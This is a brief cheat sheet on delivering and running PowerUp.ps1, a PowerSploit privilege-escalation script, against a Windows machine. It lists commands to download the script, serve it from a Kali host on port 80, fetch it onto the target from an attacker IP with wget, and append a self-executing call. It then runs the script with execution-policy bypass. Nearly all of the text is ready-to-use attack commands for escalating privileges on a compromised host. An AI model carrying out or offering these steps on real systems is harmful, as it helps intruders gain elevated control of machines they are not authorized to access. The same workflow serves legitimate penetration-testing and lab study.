Skip to content

PowerUp.ps1

Instalation


install from git

wget https://raw.githubusercontent.com/szalek/PowerSploit/master/Privesc/PowerUp.ps1 -O /opt/windows/PowerUp.ps1
or fix existing one
find / -name '*PowerUp.ps1*' 2>/dev/null

Delivery


on kali

python3 -m http.server 80 
on windows [powershell]
wget 10.8.6.103/PowerUp.ps1 -O PowerUp.ps1

Load Then Run


. .\PowerUp.ps1
Invoke-AllChecks

Load & Run


add self execution to script

echo "" >> PowerUp.ps1
echo "Invoke-AllChecks" >> PowerUp.ps1
powershell
. .\PowerUp.ps1
cmd
powershell -ep bypass .\PowerUp-execut.ps1